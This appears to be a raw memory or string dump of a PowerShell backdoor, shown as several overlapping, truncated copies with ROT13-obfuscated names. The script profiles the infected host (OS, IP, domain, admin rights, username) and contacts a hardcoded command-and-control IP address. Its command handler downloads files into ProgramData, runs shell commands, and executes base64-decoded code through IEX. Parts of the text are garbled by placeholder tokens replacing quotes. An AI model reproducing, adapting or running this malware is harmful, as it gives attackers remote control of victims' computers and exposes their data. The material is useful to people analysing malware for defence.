| return ((get-itemproperty -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion" -Name ProductName).ProductName) | |
| } catch { | |
| return "ErrorOS"; | |
| } | |
| } | |
| function trgNepu(){ | |
| try{ | |
| if([System.IntPtr]::Size -eq 4){ | |
| return "32-bit" | |
| } | |
| else{ | |
| return "64-bit" | |
| } | |
| } catch { | |
| return "ErrorArch"; | |
| } | |
| } | |
| function trgQbznva(){ | |
| try{ | |
| return ((net config workstation) -match V7XWorkstation domain\s+\S+kXBV7X -replace V7X.+?(\S+)kXBV7X,V7XkXB1V7X); | |
| } catch { | |
| return "ErrorDomain"; | |
| } | |
| } | |
| function trgUbfgAnzr(){ | |
| try{ | |
| return ([System.Net.DNS]::GetHostByName(V7XV7X).HostName); | |
| } catch { | |
| return "ErrorHostName"; | |
| } | |
| } | |
| function trgHfreanzr(){ | |
| try{ | |
| try{ | |
| kXBsfb = New-Object -ComObject Scripting.FileSystemObject; | |
| kXBhfre = kXBenv:UserName | |
| kXBghfre = kXBhfre.replace(V7X[^a-zA-Z0-9]V7X,V7XV7X) | |
| if(kXBghfr -eq kXBhfre){ | |
| return kXBhfre | |
| } | |
| return (kXBsfb.getfolder(V7Xc:\\users\\V7X + kXBenv:UserName).ShortName) | |
| } catch { | |
| return kXBenv:UserName | |
| } | |
| } catch { | |
| return "-" | |
| } | |
| } | |
| function vfNqzva(){ | |
| try{ | |
| kXBJvaqbjfVqragvgl = [system.security.principal.windowsidentity]::GetCurrent() | |
| kXBCevapvcny = New-Object System.Security.Principal.WindowsPrincipal(kXBJvaqbjfVqragvgl) | |
| kXBNqzvaEbyr = [System.Security.Principal.WindowsBuiltInRole]::Administrator | |
| if (kXBCevapvcny.IsInRole(kXBNqzvaEbyr)) | |
| { | |
| return V7X+V7X | |
| } | |
| else | |
| { | |
| return V7XV7X | |
| } | |
| } catch { | |
| return "" | |
| } | |
| } | |
| function trgCVC(){ | |
| try{ | |
| kXBernyVC = fuggcTRG "https://v4.ident.me/" | |
| return kXBernyVC | |
| } catch { | |
| return "ErrorPublicIP" | |
| } | |
| } | |
| kXBFlfVasb = trgBF | |
| kXBFlfVasb += "**" | |
| kXBFlfVasb += trgVC | |
| kXBFlfVasb += "**" | |
| kXBFlfVasb += trgNepu | |
| kXBFlfVasb += "**" | |
| kXBFlfVasb += trgUbfgAnzr | |
| kXBFlfVasb += "**" | |
| kXBFlfVasb += trgQbznva | |
| kXBFlfVasb += "**" | |
| kXBFlfVasb += vfNqzva | |
| kXBFlfVasb += trgHfreanzr | |
| kXBFlfVasb += "**" | |
| kXBFlfVasb += trgCVC | |
| kXBglobal:id = zq5trarengbe(kXBFlfVasb) | |
| return (kXBglobal:id + V7X**V7X + kXBFlfVasb) | |
| } | |
| function zq5trarengbe(kXBfgeVa){ | |
| kXBzq5 = new-object -TypeName System.Security.Cryptography.MD5CryptoServiceProvider | |
| kXBhgs8 = new-object -TypeName System.Text.UTF8Encoding | |
| kXBunfu = [System.BitConverter]::ToString(kXBzq5.ComputeHash(kXBhgs8.GetBytes(kXBfgeVa))) | |
| kXBbhgchg = kXBunfu.replace(V7X-V7X,V7XV7X) | |
| return kXBbhgchg | |
| } | |
| function pbzznaq_naq_pbageby(kXBpzq){ | |
| try{ | |
| if(kXBpzq.StartsWith(V7XuploadV7X)){ | |
| try{ | |
| kXBpzq=kXBpzq.replace(V7Xupload V7X,V7XV7X) | |
| kXBwc = New-Object System.Net.WebClient | |
| kXBwc.proxy = [Net.WebRequest]::GetSystemWebProxy() | |
| kXBwc.proxy.Credentials = [Net.CredentialCache]::DefaultCredentials | |
| kXBwc.DownloadFile(kXBpzq, ("c:\programdata\" + kXBpzq.Substring(kXBpzq.LastIndexOf(V7X/V7X),kXBpzq.Length-kXBpzq.LastIndexOf(V7X/V7X)))) | |
| return Riny "pwd" | |
| }catch{ | |
| return kXB_.Exception.Message | |
| } | |
| } | |
| elseif(kXBpzq.StartsWith(V7XcmdV7X)){ | |
| kXBpzq=kXBpzq.replace(V7Xcmd V7X,V7XV7X) | |
| t | |
| 0x2ca3c40 (22574): | |
| $global:url = "" | |
| $global:id = "" | |
| $cevingr = 959, 713 | |
| $choyvp = 37, 437 | |
| $C = @(V7Xhttp://185.162.235.182V7X) | |
| function Zbq($x, $H, $n){ | |
| $Xi = $x | |
| $Ei = $H | |
| $Yi = 1 | |
| while($Ei -gt 0){ | |
| if(($Ei % 2) -eq 0) { | |
| $Xi = ($Xi * $Xi) % $n | |
| $Ei = $Ei / 2 | |
| } else { | |
| $Yi = ($Xi * $Yi) % $n | |
| $Ei = $Ei - 1 | |
| } | |
| } | |
| return $Yi | |
| } | |
| function raPelcg($pk, $cynvagrkg){ | |
| try{ | |
| $xrl, $n = $pk; | |
| $zlneenl = @(); | |
| for($i=0; $i -lt $cynvagrkg.Length; $i++){ | |
| $ahz = [int][char]$cynvagrkg[$i] | |
| $t = Zbq $ahz $xrl $n | |
| $zlneenl += $t | |
| } | |
| return $zlneenl | |
| } | |
| catch{ | |
| trgEnaqbzCebkl | |
| } | |
| } | |
| function qrPelcg($pk, $pvcuregrkg){ | |
| try{ | |
| $xrl, $n = $pk; | |
| $zl_neenl = @(); | |
| for ($i = 0 ; $i -lt $pvcuregrkg.Length; $i++){ | |
| $ahz = [int]$pvcuregrkg[$i] | |
| $t = Zbq $ahz $xrl $n | |
| $zl_neenl += [convert]::ToChar([int]$t) | |
| } | |
| return -join $zl_neenl | |
| } | |
| catch{ | |
| trgEnaqbzCebkl | |
| } | |
| } | |
| function uggcCBFG($hey,$rap_zft){ | |
| trgEnaqbzCebkl | |
| try{ | |
| $pbagrag = $rap_zft | |
| $jroerd = [System.Net.WebRequest]::Create($global:url + $hey); | |
| $jroerd.proxy = [Net.WebRequest]::GetSystemWebProxy() | |
| $jroerd.proxy.Credentials = [Net.CredentialCache]::DefaultCredentials | |
| $rapbqr_qngn = [System.Text.Encoding]::UTF8.GetBytes($pbagrag); | |
| $jroerd.Method = "POST"; | |
| $jroerd.ContentLength = $rapbqr_qngn.length; | |
| $jroerd.ContentType = "application/json" | |
| if ($rapbqr_qngn.Length -gt 0){ | |
| $erd_fgernz = $jroerd.GetRequestStream(); | |
| $erd_fgernz.Write($rapbqr_qngn, 0, $rapbqr_qngn.Length); | |
| } | |
| [System.Net.WebResponse] $erfc = $jroerd.GetResponse(); | |
| if ($erfc -ne $null){ | |
| $qngn = $erfc.GetResponseStream(); | |
| [System.IO.StreamReader] $erf_qngn = New-Object System.IO.StreamReader $qngn; | |
| [String] $erfhyg = $erf_qngn.ReadToEnd(); | |
| } | |
| } catch { | |
| $erfhyg = "error" | |
| write-host $hey "`t" ($global:url + $_.Exception.Message) | |
| trgEnaqbzCebkl | |
| start-sleep (Get-Random -Minimum 20 -Maximum 40) | |
| } | |
| return $erfhyg | |
| } | |
| function uggcTRG($hey){ | |
| trgEnaqbzCebkl | |
| try | |
| { | |
| $jroerd = [System.Net.WebRequest]::Create($global:url + $hey); | |
| $jroerd.proxy = [Net.WebRequest]::GetSystemWebProxy() | |
| $jroerd.proxy.Credentials = [Net.CredentialCache]::DefaultCredentials | |
| $jroerd.Method = "GET"; | |
| [System.Net.WebResponse] $erfc = $jroerd.GetResponse(); | |
| if ($erfc -ne $null){ | |
| $qngn = $erfc.GetResponseStream(); | |
| [System.IO.StreamReader] $erf_qngn = New-Object System.IO.StreamReader $qngn; | |
| [String] $erfhyg = $erf_qngn.ReadToEnd(); | |
| } | |
| } catch { | |
| $erfhyg = "error" | |
| write-host $hey "`t" ($global:url + $_.Exception.Message) | |
| trgEnaqbzCebkl | |
| start-sleep (Get-Random -Minimum 20 -Maximum 40) | |
| } | |
| return $erfhyg | |
| } | |
| function fuggcTRG($hey){ | |
| try | |
| { | |
| $jroerd = [System.Net.WebRequest]::Create($hey); | |
| $jroerd.proxy = [Net.WebRequest]::GetSystemWebProxy() | |
| $jroerd.proxy.Credentials = [Net.CredentialCache]::DefaultCredentials | |
| $jroerd.Method = "GET"; | |
| [System.Net.WebResponse] $erfc = $jroerd.GetResponse(); | |
| if ($erfc -ne $null){ | |
| $qngn = $erfc.GetResponseStream(); | |
| [System.IO.StreamReader] $erf_qngn = New-Object System.IO.StreamReader $qngn; | |
| [String] $erfhyg = $erf_qngn.ReadToEnd(); | |
| } | |
| } | |
| catch { | |
| $erfhyg = "" | |
| } | |
| return $erfhyg | |
| } | |
| function Riny($pzq){ | |
| try{ | |
| $bhg = IEX $pzq -ErrorAction SilentlyContinue | |
| if($pzq.StartsWith("cd")){$bhg = $PWD;} | |
| $bhg = ($bhg | Out-String) | |
| } catch { | |
| $bhg = $_.Exception.Message | |
| } | |
| return $bhg | |
| } | |
| function vasbvavg(){ | |
| function trgVC(){ | |
| try{ | |
| return ($(ipconfig | where {$_ -match V7XIPv4.+\s(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})V7X } | out-null; $Zngpurf[1])); | |
| } catch { | |
| return "ErrorIP"; | |
| } | |
| } | |
| function trgBF(){ | |
| try{ | |
| return ((get-itemproperty -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion" -Name ProductName).ProductName) | |
| } catch { | |
| return "ErrorOS"; | |
| } | |
| } | |
| function trgNepu(){ | |
| try{ | |
| if([System.IntPtr]::Size -eq 4){ | |
| return "32-bit" | |
| } | |
| else{ | |
| return "64-bit" | |
| } | |
| } catch { | |
| return "ErrorArch"; | |
| } | |
| } | |
| function trgQbznva(){ | |
| try{ | |
| return ((net config workstation) -match V7XWorkstation domain\s+\S+$V7X -replace V7X.+?(\S+)$V7X,V7X$1V7X); | |
| } catch { | |
| return "ErrorDomain"; | |
| } | |
| } | |
| function trgUbfgAnzr(){ | |
| try{ | |
| return ([System.Net.DNS]::GetHostByName(V7XV7X).HostName); | |
| } catch { | |
| return "ErrorHostName"; | |
| } | |
| } | |
| function trgHfreanzr(){ | |
| try{ | |
| try{ | |
| $sfb = New-Object -ComObject Scripting.FileSystemObject; | |
| $hfre = $env:UserName | |
| $ghfre = $hfre.replace(V7X[^a-zA-Z0-9]V7X,V7XV7X) | |
| if($ghfr -eq $hfre){ | |
| return $hfre | |
| } | |
| return ($sfb.getfolder(V7Xc:\\users\\V7X + $env:UserName).ShortName) | |
| } catch { | |
| return $env:UserName | |
| } | |
| } catch { | |
| return "-" | |
| } | |
| } | |
| function vfNqzva(){ | |
| try{ | |
| $JvaqbjfVqragvgl = [system.security.principal.windowsidentity]::GetCurrent() | |
| $Cevapvcny = New-Object System.Security.Principal.WindowsPrincipal($JvaqbjfVqragvgl) | |
| $NqzvaEbyr = [System.Security.Principal.WindowsBuiltInRole]::Administrator | |
| if ($Cevapvcny.IsInRole($NqzvaEbyr)) | |
| { | |
| return V7X+V7X | |
| } | |
| else | |
| { | |
| return V7XV7X | |
| } | |
| } catch { | |
| return "" | |
| } | |
| } | |
| function trgCVC(){ | |
| try{ | |
| $ernyVC = fuggcTRG "https://v4.ident.me/" | |
| return $ernyVC | |
| } catch { | |
| return "ErrorPublicIP" | |
| } | |
| } | |
| $FlfVasb = trgBF | |
| $FlfVasb += "**" | |
| $FlfVasb += trgVC | |
| $FlfVasb += "**" | |
| $FlfVasb += trgNepu | |
| $FlfVasb += "**" | |
| $FlfVasb += trgUbfgAnzr | |
| $FlfVasb += "**" | |
| $FlfVasb += trgQbznva | |
| $FlfVasb += "**" | |
| $FlfVasb += vfNqzva | |
| $FlfVasb += trgHfreanzr | |
| $FlfVasb += "**" | |
| $FlfVasb += trgCVC | |
| $global:id = zq5trarengbe($FlfVasb) | |
| return ($global:id + V7X**V7X + $FlfVasb) | |
| } | |
| function zq5trarengbe($fgeVa){ | |
| $zq5 = new-object -TypeName System.Security.Cryptography.MD5CryptoServiceProvider | |
| $hgs8 = new-object -TypeName System.Text.UTF8Encoding | |
| $unfu = [System.BitConverter]::ToString($zq5.ComputeHash($hgs8.GetBytes($fgeVa))) | |
| $bhgchg = $unfu.replace(V7X-V7X,V7XV7X) | |
| return $bhgchg | |
| } | |
| function pbzznaq_naq_pbageby($pzq){ | |
| try{ | |
| if($pzq.StartsWith(V7XuploadV7X)){ | |
| try{ | |
| $pzq=$pzq.replace(V7Xupload V7X,V7XV7X) | |
| $wc = New-Object System.Net.WebClient | |
| $wc.proxy = [Net.WebRequest]::GetSystemWebProxy() | |
| $wc.proxy.Credentials = [Net.CredentialCache]::DefaultCredentials | |
| $wc.DownloadFile($pzq, ("c:\programdata\" + $pzq.Substring($pzq.LastIndexOf(V7X/V7X),$pzq.Length-$pzq.LastIndexOf(V7X/V7X)))) | |
| return Riny "pwd" | |
| }catch{ | |
| return $_.Exception.Message | |
| } | |
| } | |
| elseif($pzq.StartsWith(V7XcmdV7X)){ | |
| $pzq=$pzq.replace(V7Xcmd V7X,V7XV7X) | |
| try{ | |
| $bhg = cmd /c $pzq | |
| $bhg = $bhg | Out-String | |
| return $bhg | |
| } catch { | |
| return $_.Exception.Message | |
| } | |
| } | |
| elseif($pzq.StartsWith(V7Xb64V7X)){ | |
| $pzq=$pzq.replace(V7Xb64 V7X,V7XV7X) | |
| try{ | |
| $pzq = [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($pzq)) | |
| $bhg = Ri | |
| 0x2cac1c0 (22310): | |
| $global:url = "" | |
| $global:id = "" | |
| $cevingr = 959, 713 | |
| $choyvp = 37, 437 | |
| $C = @('http://185.162.235.182') | |
| function Zbq($x, $H, $n){ | |
| $Xi = $x | |
| $Ei = $H | |
| $Yi = 1 | |
| while($Ei -gt 0){ | |
| if(($Ei % 2) -eq 0) { | |
| $Xi = ($Xi * $Xi) % $n | |
| $Ei = $Ei / 2 | |
| } else { | |
| $Yi = ($Xi * $Yi) % $n | |
| $Ei = $Ei - 1 | |
| } | |
| } | |
| return $Yi | |
| } | |
| function raPelcg($pk, $cynvagrkg){ | |
| try{ | |
| $xrl, $n = $pk; | |
| $zlneenl = @(); | |
| for($i=0; $i -lt $cynvagrkg.Length; $i++){ | |
| $ahz = [int][char]$cynvagrkg[$i] | |
| $t = Zbq $ahz $xrl $n | |
| $zlneenl += $t | |
| } | |
| return $zlneenl | |
| } | |
| catch{ | |
| trgEnaqbzCebkl | |
| } | |
| } | |
| function qrPelcg($pk, $pvcuregrkg){ | |
| try{ | |
| $xrl, $n = $pk; | |
| $zl_neenl = @(); | |
| for ($i = 0 ; $i -lt $pvcuregrkg.Length; $i++){ | |
| $ahz = [int]$pvcuregrkg[$i] | |
| $t = Zbq $ahz $xrl $n | |
| $zl_neenl += [convert]::ToChar([int]$t) | |
| } | |
| return -join $zl_neenl | |
| } | |
| catch{ | |
| trgEnaqbzCebkl | |
| } | |
| } | |
| function uggcCBFG($hey,$rap_zft){ | |
| trgEnaqbzCebkl | |
| try{ | |
| $pbagrag = $rap_zft | |
| $jroerd = [System.Net.WebRequest]::Create($global:url + $hey); | |
| $jroerd.proxy = [Net.WebRequest]::GetSystemWebProxy() | |
| $jroerd.proxy.Credentials = [Net.CredentialCache]::DefaultCredentials | |
| $rapbqr_qngn = [System.Text.Encoding]::UTF8.GetBytes($pbagrag); | |
| $jroerd.Method = "POST"; | |
| $jroerd.ContentLength = $rapbqr_qngn.length; | |
| $jroerd.ContentType = "application/json" | |
| if ($rapbqr_qngn.Length -gt 0){ | |
| $erd_fgernz = $jroerd.GetRequestStream(); | |
| $erd_fgernz.Write($rapbqr_qngn, 0, $rapbqr_qngn.Length); | |
| } | |
| [System.Net.WebResponse] $erfc = $jroerd.GetResponse(); | |
| if ($erfc -ne $null){ | |
| $qngn = $erfc.GetResponseStream(); | |
| [System.IO.StreamReader] $erf_qngn = New-Object System.IO.StreamReader $qngn; | |
| [String] $erfhyg = $erf_qngn.ReadToEnd(); | |
| } | |
| } catch { | |
| $erfhyg = "error" | |
| write-host $hey "`t" ($global:url + $_.Exception.Message) | |
| trgEnaqbzCebkl | |
| start-sleep (Get-Random -Minimum 20 -Maximum 40) | |
| } | |
| return $erfhyg | |
| } | |
| function uggcTRG($hey){ | |
| trgEnaqbzCebkl | |
| try | |
| { | |
| $jroerd = [System.Net.WebRequest]::Create($global:url + $hey); | |
| $jroerd.proxy = [Net.WebRequest]::GetSystemWebProxy() | |
| $jroerd.proxy.Credentials = [Net.CredentialCache]::DefaultCredentials | |
| $jroerd.Method = "GET"; | |
| [System.Net.WebResponse] $erfc = $jroerd.GetResponse(); | |
| if ($erfc -ne $null){ | |
| $qngn = $erfc.GetResponseStream(); | |
| [System.IO.StreamReader] $erf_qngn = New-Object System.IO.StreamReader $qngn; | |
| [String] $erfhyg = $erf_qngn.ReadToEnd(); | |
| } | |
| } catch { | |
| $erfhyg = "error" | |
| write-host $hey "`t" ($global:url + $_.Exception.Message) | |
| trgEnaqbzCebkl | |
| start-sleep (Get-Random -Minimum 20 -Maximum 40) | |
| } | |
| return $erfhyg | |
| } | |
| function fuggcTRG($hey){ | |
| try | |
| { | |
| $jroerd = [System.Net.WebRequest]::Create($hey); | |
| $jroerd.proxy = [Net.WebRequest]::GetSystemWebProxy() | |
| $jroerd.proxy.Credentials = [Net.CredentialCache]::DefaultCredentials | |
| $jroerd.Method = "GET"; | |
| [System.Net.WebResponse] $erfc = $jroerd.GetResponse(); | |
| if ($erfc -ne $null){ | |
| $qngn = $erfc.GetResponseStream(); | |
| [System.IO.StreamReader] $erf_qngn = New-Object System.IO.StreamReader $qngn; | |
| [String] $erfhyg = $erf_qngn.ReadToEnd(); | |
| } | |
| } | |
| catch { | |
| $erfhyg = "" | |
| } | |
| return $erfhyg | |
| } | |
| function Riny($pzq){ | |
| try{ | |
| $bhg = IEX $pzq -ErrorAction SilentlyContinue | |
| if($pzq.StartsWith("cd")){$bhg = $PWD;} | |
| $bhg = ($bhg | Out-String) | |
| } catch { | |
| $bhg = $_.Exception.Message | |
| } | |
| return $bhg | |
| } | |
| function vasbvavg(){ | |
| function trgVC(){ | |
| try{ | |
| return ($(ipconfig | where {$_ -match 'IPv4.+\s(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})' } | out-null; $Zngpurf[1])); | |
| } catch { | |
| return "ErrorIP"; | |
| } | |
| } | |
| function trgBF(){ | |
| try{ | |
| return ((get-itemproperty -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion" -Name ProductName).ProductName) | |
| } catch { | |
| return "ErrorOS"; | |
| } | |
| } | |
| function trgNepu(){ | |
| try{ | |
| if([System.IntPtr]::Size -eq 4){ | |
| return "32-bit" | |
| } | |
| else{ | |
| return "64-bit" | |
| } | |
| } catch { | |
| return "ErrorArch"; | |
| } | |
| } | |
| function trgQbznva(){ | |
| try{ | |
| return ((net config workstation) -match 'Workstation domain\s+\S+$' -replace '.+?(\S+)$','$1'); | |
| } catch { | |
| return "ErrorDomain"; | |
| } | |
| } | |
| function trgUbfgAnzr(){ | |
| try{ | |
| return ([System.Net.DNS]::GetHostByName('').HostName); | |
| } catch { | |
| return "ErrorHostName"; | |
| } | |
| } | |
| function trgHfreanzr(){ | |
| try{ | |
| try{ | |
| $sfb = New-Object -ComObject Scripting.FileSystemObject; | |
| $hfre = $env:UserName | |
| $ghfre = $hfre.replace('[^a-zA-Z0-9]','') | |
| if($ghfr -eq $hfre){ | |
| return $hfre | |
| } | |
| return ($sfb.getfolder('c:\\users\\' + $env:UserName).ShortName) | |
| } catch { | |
| return $env:UserName | |
| } | |
| } catch { | |
| return "-" | |
| } | |
| } | |
| function vfNqzva(){ | |
| try{ | |
| $JvaqbjfVqragvgl = [system.security.principal.windowsidentity]::GetCurrent() | |
| $Cevapvcny = New-Object System.Security.Principal.WindowsPrincipal($JvaqbjfVqragvgl) | |
| $NqzvaEbyr = [System.Security.Principal.WindowsBuiltInRole]::Administrator | |
| if ($Cevapvcny.IsInRole($NqzvaEbyr)) | |
| { | |
| return '+' | |
| } | |
| else | |
| { | |
| return '' | |
| } | |
| } catch { | |
| return "" | |
| } | |
| } | |
| function trgCVC(){ | |
| try{ | |
| $ernyVC = fuggcTRG "https://v4.ident.me/" | |
| return $ernyVC | |
| } catch { | |
| return "ErrorPublicIP" | |
| } | |
| } | |
| $FlfVasb = trgBF | |
| $FlfVasb += "**" | |
| $FlfVasb += trgVC | |
| $FlfVasb += "**" | |
| $FlfVasb += trgNepu | |
| $FlfVasb += "**" | |
| $FlfVasb += trgUbfgAnzr | |
| $FlfVasb += "**" | |
| $FlfVasb += trgQbznva | |
| $FlfVasb += "**" | |
| $FlfVasb += vfNqzva | |
| $FlfVasb += trgHfreanzr | |
| $FlfVasb += "**" | |
| $FlfVasb += trgCVC | |
| $global:id = zq5trarengbe($FlfVasb) | |
| return ($global:id + '**' + $FlfVasb) | |
| } | |
| function zq5trarengbe($fgeVa){ | |
| $zq5 = new-object -TypeName System.Security.Cryptography.MD5CryptoServiceProvider | |
| $hgs8 = new-object -TypeName System.Text.UTF8Encoding | |
| $unfu = [System.BitConverter]::ToString($zq5.ComputeHash($hgs8.GetBytes($fgeVa))) | |
| $bhgchg = $unfu.replace('-','') | |
| return $bhgchg | |
| } | |
| function pbzznaq_naq_pbageby($pzq){ | |
| try{ | |
| if($pzq.StartsWith('upload')){ | |
| try{ | |
| $pzq=$pzq.replace('upload ','') | |
| $wc = New-Object System.Net.WebClient | |
| $wc.proxy = [Net.WebRequest]::GetSystemWebProxy() | |
| $wc.proxy.Credentials = [Net.CredentialCache]::DefaultCredentials | |
| $wc.DownloadFile($pzq, ("c:\programdata\" + $pzq.Substring($pzq.LastIndexOf('/'),$pzq.Length-$pzq.LastIndexOf('/')))) | |
| return Riny "pwd" | |
| }catch{ | |
| return $_.Exception.Message | |
| } | |
| } | |
| elseif($pzq.StartsWith('cmd')){ | |
| $pzq=$pzq.replace('cmd ','') | |
| try{ | |
| $bhg = cmd /c $pzq | |
| $bhg = $bhg | Out-String | |
| return $bhg | |
| } catch { | |
| return $_.Exception.Message | |
| } | |
| } | |
| elseif($pzq.StartsWith('b64')){ | |
| $pzq=$pzq.replace('b64 ','') | |
| try{ | |
| $pzq = [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($pzq)) | |
| $bhg = Riny $pzq | |
| $bhg = $bhg | Out-String | |
| return $bhg | |
| } catch |